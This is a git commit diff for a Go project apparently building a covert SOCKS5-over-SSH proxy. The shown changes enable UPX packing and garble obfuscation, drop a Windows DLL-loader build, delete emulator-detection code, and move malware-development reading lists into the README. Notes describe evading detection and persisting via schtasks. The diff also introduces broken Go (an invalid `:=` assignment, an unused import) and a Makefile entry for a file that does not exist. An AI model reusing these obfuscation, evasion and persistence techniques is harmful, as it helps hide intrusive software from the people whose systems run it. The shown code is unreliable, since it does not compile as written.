10 changed files with 27 additions and 117 deletions
--- a/.goreleaser.yaml
+++ b/.goreleaser.yaml
@ -26,30 +26,13 @@ builds:
    goarch:
      - amd64
    ldflags:
-      - -w -trimpath
+      - -s -trimpath
    gobinary: "scripts/garble.sh"
    buildmode: c-shared
    tags:
      - release
      - dll

-  - id: "win-dll-loader"
-    env:
-      - CGO_ENABLED=1
-      - CC=x86_64-w64-mingw32-gcc
-      - CXX=x86_64-w64-mingw32-g++
-    main: ./cmd/win-dll-runner/main.go
-    ldflags:
-      - -w
-    gobinary: "scripts/garble.sh"
-    goos:
-      - windows
-    goarch:
-      - amd64
-    tags:
-      - release
-
-
  - id: "win-release"
    env:
      - CGO_ENABLED=1
@ -60,7 +43,7 @@ builds:
    goarch:
      - amd64
    ldflags:
-      - -w -H=windowsgui
+      - -H=windowsgui
    gobinary: "scripts/garble.sh"
    tags:
      - release
@ -69,7 +52,7 @@ upx:
  - # Whether to enable it or not.
    #
    # Templates: allowed.
-    enabled: false
+    enabled: true

    # Filter by build ID.
    #ids: [build1, build2]
--- a/4
+++ b/4
@ -1,4 +1,4 @@
-SOURCES=Makefile main.go main_release.go main_debug.go config.go config_release.go config_template.go system.go system_windows.go system_linux.go system_darwin.go
+SOURCES=Makefile main.go main_release.go main_debug.go config.go config_release.go config_template.go system.go system_windows.go system_unix.go
 GARBLE_BIN = $(shell go env GOPATH)/bin/garble
 GARBLE_CMD = $(GARBLE_BIN) -literals -tiny

@ -14,7 +14,7 @@ test: socks5-ssh-proxy
 test-release: socks5-ssh-proxy.release
 	./socks5-ssh-proxy.release
 socks5-ssh-proxy: $(SOURCES) 
-	GOOS=linux GOARCH=amd64 go build -tags release,linux -o $@
+	go build -o $@
 socks5-ssh-proxy.release: resources $(SOURCES) $(GARBLE_BIN)
 	GOOS=darwin GOARCH=amd64 $(GARBLE_CMD) build -tags release -o $@
 	upx $@
--- a/README.md
+++ b/README.md
@ -62,3 +62,19 @@ Following detections have been tested:
 * upx
 * goreleaser
 * mingw-w64 (for building the windows dll/exe)
+
+## Related information
+
+* <https://github.com/rootkit-io/awesome-malware-development>
+* <https://github.com/rshipp/awesome-malware-analysis#readme>
+* <https://github.com/Karneades/awesome-malware-persistence#readme>>
+* <https://www.yourcts.com/2024/01/19/beware-of-new-go-based-malware/>
+* <https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6>
+* <https://emulator41.medium.com/golang-malware-used-by-cybercriminals-408276a276c8>
+* <https://synzack.github.io/Tunneling-Traffic-With-SSL-and-TLS/>
+
+## Development information
+
+* <https://pypi.org/project/unipacker/>
+* <https://medium.com/analytics-vidhya/running-go-code-from-python-a65b3ae34a2d>
+* <https://github.com/burrowers/garble?tab=readme-ov-file#mechanism>>
--- a/cmd/win-dll-runner/main.go
+++ b/cmd/win-dll-runner/main.go
@ -5,6 +5,7 @@ package main

 import (
 	"golang.org/x/sys/windows"
+	"os"
 )

 func runMainFromDLL() {
@ -16,7 +17,7 @@ func runMainFromDLL() {
 		return
 	}

-	_, _, _ = runMainFunc.Call()
+	_, _, _ := runMainFunc.Call()
 }

 func main() {
--- a/docs/NOTES.md
+++ b/docs/NOTES.md
@ -46,44 +46,9 @@ Check if running under wine by testing if executables are present:

 * The "VMK" environment variable is the VerboseModeKey which enables logging to stdout/stderr even in release build

-## OS and emulator/environment detector
-
-* Linux
-  * Native
-  * Msys (Windows)
-  * CYGWIN (Windows)
-  * [Microsoft WSL & WSLv2](https://github.com/microsoft/WSL/issues/4071)
-  * [FreeBSD linuxemu](https://docs.freebsd.org/en/books/handbook/linuxemu/)
-* Windows
-  * WINE
-  * ReactOS
-  * Native
-* Darwin (macOS)
-
 ## Windows

 * Copy to well known current user binary path to semi related filenames
 * Run via start menu item for current user, or via `schtasks`
  * <https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create>
  * <https://github.com/emersion/go-autostart>
-
-## Detection
-
-* <https://www.logpoint.com/en/blog/deep-dive-on-malicious-dlls/>
-* <https://github.com/sandflysecurity/sandfly-entropyscan>
-* <https://pypi.org/project/unipacker/>
-
-## Related information
-
-* <https://github.com/rootkit-io/awesome-malware-development>
-* <https://github.com/rshipp/awesome-malware-analysis#readme>
-* <https://github.com/Karneades/awesome-malware-persistence#readme>>
-* <https://www.yourcts.com/2024/01/19/beware-of-new-go-based-malware/>
-* <https://posts.specterops.io/offensive-security-guide-to-ssh-tunnels-and-proxies-b525cbd4d4c6>
-* <https://emulator41.medium.com/golang-malware-used-by-cybercriminals-408276a276c8>
-* <https://synzack.github.io/Tunneling-Traffic-With-SSL-and-TLS/>
-
-## Development information
-
-* <https://medium.com/analytics-vidhya/running-go-code-from-python-a65b3ae34a2d>
-* <https://github.com/burrowers/garble?tab=readme-ov-file#mechanism>>
--- a/go.mod
+++ b/go.mod
@ -6,13 +6,13 @@ require (
 	github.com/cloudfoundry/socks5-proxy v0.2.120
 	github.com/xor-gate/sshfp v0.0.0-20200411085609-13942eb67330
 	golang.org/x/crypto v0.25.0
-	golang.org/x/sys v0.22.0
 )

 require (
 	github.com/cloudfoundry/go-socks5 v0.0.0-20180221174514-54f73bdb8a8e // indirect
 	github.com/miekg/dns v1.1.29 // indirect
 	golang.org/x/net v0.27.0 // indirect
+	golang.org/x/sys v0.22.0 // indirect
 )

 replace github.com/cloudfoundry/socks5-proxy v0.2.120 => github.com/xor-gate/socks5-proxy v0.0.0-20240724155447-4b9ab1a56d38
--- a/system.go
+++ b/system.go
@ -156,8 +156,6 @@ func systemIgnoreAllSignals() {
 }

 func systemOSDetect() {
-	systemGetUname()
-
 	wineVersion := systemGetWINEVersion()
 	log.Println("WINE version", wineVersion)
 	log.Println("IsUserRoot", systemIsUserRoot())
--- a/system_linux.go
+++ b/system_linux.go
@ -1,49 +0,0 @@
-//go:build linux
-// +build linux
-
-package main
-
-import (
-	"log"
-	"syscall"
-	"strings"
-)
-
-func systemGetWINEVersion() string {
-	return ""
-}
-
-func systemGetUname() {
-	var uts syscall.Utsname
-
-	err := syscall.Uname(&uts)
-	if err != nil {
-		log.Println("Error getting system information:", err)
-		return
-	}
-
-	// Convert the byte arrays to strings
-	sysname := int8SliceToString(uts.Sysname[:])
-	release := int8SliceToString(uts.Release[:])
-	version := int8SliceToString(uts.Version[:])
-
-	// Check for FreeBSD Linux emulation specific indicators
-	log.Println("syscall.Uname:", "(sysname)", sysname, "(release)", release, "(version)", version)
-	if strings.Contains(sysname, "Linux") && strings.Contains(version, "FreeBSD") {
-		log.Println("Running under FreeBSD linuxemu")
-	}
-}
-
-// int8SliceToString converts a slice of int8 to a string.
-func int8SliceToString(int8Slice []int8) string {
-	// Create a byte slice with the same length as the int8 slice
-	byteSlice := make([]byte, len(int8Slice))
-	for i, v := range int8Slice {
-		byteSlice[i] = byte(v)
-	}
-	return string(byteSlice)
-}
-
-func systemIsUserRoot() bool {
-	return false
-}
--- a/system_darwin.go
+++ b/system_darwin.go
@ -1,14 +1,13 @@
-//go:build darwin 
-// +build darwin
+//go:build !windows
+// +build !windows

+//
 package main

 func systemGetWINEVersion() string {
 	return ""
 }

-func systemGetUname() {
-}

 func systemIsUserRoot() bool {
 	return false
--- a/system_windows.go
+++ b/system_windows.go
@ -26,9 +26,6 @@ func systemGetWINEVersion() string {
 	return wineVersion
 }

-func systemGetUname() {
-}
-
 func systemIsUserRoot() bool {
 	root := true